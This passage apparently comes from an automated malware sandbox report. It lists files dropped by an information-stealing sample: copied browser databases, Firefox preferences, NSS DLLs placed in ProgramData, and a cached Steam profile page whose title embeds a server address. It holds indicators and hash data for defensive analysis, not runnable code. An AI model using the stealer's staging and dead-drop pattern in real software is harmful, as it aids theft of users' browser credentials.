                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                                          MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                                          SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                                          SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                                          SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\GIEBFHCAKFBG\FBKFCF

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.848598812124929
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                                                          MD5:9664DAA86F8917816B588C715D97BE07
                                                                                                                          SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                                                          SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                                                          SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\GIEBFHCAKFBG\FHCGHJ

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):196608
                                                                                                                          Entropy (8bit):1.1215420383712111
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                                                          MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                                                          SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                                                          SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                                                          SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\GIEBFHCAKFBG\GIEBFH

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:ASCII text, with very long lines (1769), with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9370
                                                                                                                          Entropy (8bit):5.514140640374404
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
                                                                                                                          MD5:7E44458E0A8A3A7D10875BC3B7AE72D1
                                                                                                                          SHA1:E5E6AC8676EE3761DAB13A10EB7573C19F48D297
                                                                                                                          SHA-256:21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
                                                                                                                          SHA-512:012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
                                                                                                                          Malicious:false
                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                          C:\ProgramData\GIEBFHCAKFBG\HJDGHI

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):98304
                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\GIEBFHCAKFBG\HJDGHI-shm

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32768
                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                          Malicious:false
                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\GIEBFHCAKFBG\HJKKFI

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\GIEBFHCAKFBG\JDBGHI

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):155648
                                                                                                                          Entropy (8bit):0.5407252242845243
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\GIEBFHCAKFBG\JDGCGH

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):51200
                                                                                                                          Entropy (8bit):0.8746135976761988
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\GIEBFHCAKFBG\JJKFBA

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\freebl3.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):685392
                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Joe Sandbox View:
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          • Filename: nJohIBtNm5.exe, Detection: malicious, Browse
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 66fb252fe232b_Patksl.exe, Detection: malicious, Browse
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\mozglue.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):608080
                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\msvcp140.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):450024
                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\nss3.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2046288
                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\softokn3.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):257872
                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\vcruntime140.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):80880
                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):42
                                                                                                                          Entropy (8bit):4.0050635535766075
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                          Malicious:true
                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\76561199780418869[1].htm

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):34879
                                                                                                                          Entropy (8bit):5.398607497371507
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:Mdpqme0Ih+3tAA6WGWefcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2v:Md8me0Ih+3tAA6WGWeFhTBv++nIjBtPD
                                                                                                                          MD5:8BA614C10AC29EA5BBB5F6A02923096E
                                                                                                                          SHA1:D69BC8D7CD69E32F8FA05B796F926658A9B90941
                                                                                                                          SHA-256:96628903BF146A49D9B112C8BA25FC756F35B4943CF584179BF8856AFF79F927
                                                                                                                          SHA-512:977E80718C694E835817CDA706E9ED7336493E9FF3515DE45F1BB4E155D8FEFA8D76A4F5C5D3F0C1FA16B92C88E27C8857AFEC64163127C575ABE0BF03F6AE3F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.197.9|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href=

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\a43486128347[1].exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):13
                                                                                                                          Entropy (8bit):2.8150724101159437
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:+MEM:+BM
                                                                                                                          MD5:AEE9784C03B80D38D3271CDE2B252B8D
                                                                                                                          SHA1:E5FD9AA24C9417E7332E6F25936AE2A6EC8F1524
                                                                                                                          SHA-256:27C2CCD962C2B8DCCB52FE3688AB236F186F7A41FD57D810478712048E9AD3F8
                                                                                                                          SHA-512:A83C2F678A77228F5C7F2FB61A723217892B8422913739D1C65CB97701C341361EEEE617E9D050A86B552DB4DD87B18CFB94443977A75A5862171346609E9472
                                                                                                                          Malicious:false
                                                                                                                          Preview:Unknown error

                                                                                                                          C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1048575
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:fPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP3:f
                                                                                                                          MD5:C1C54CFC4D7B15B63B1844C9379B3862
                                                                                                                          SHA1:0564C717F1A392D254218FDDEBB9A9E36B57E4B8
                                                                                                                          SHA-256:D735D28333CED8067C04FDB4C0D2B0E0B6D085C28A39B00F1E8314B0E529CC1D
                                                                                                                          SHA-512:5DF4BAC25F1EDA7238E368179321E57BEC2E9B02982F23A7D870DAE375CAE6DD536BF44DAC27CA01748D7235EAB386341F3265D3AD4347167F8697A4573F835F
                                                                                                                          Malicious:false
                                                                                                                          Preview:****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************

                                                                                                                          C:\Users\user\AppData\Roaming\msvcp110.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):598016
                                                                                                                          Entropy (8bit):6.952931140788552
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:dfK7na3lNTVvqotaCsq/0TT5GvdKM9KwdTVLG:dfUaTVZtaCsJMkcG
                                                                                                                          MD5:54B8F43259C486D87DBB9B4B4A71014B
                                                                                                                          SHA1:373351ECC936B3F9DBB2C858CD0342CA7AF807E8
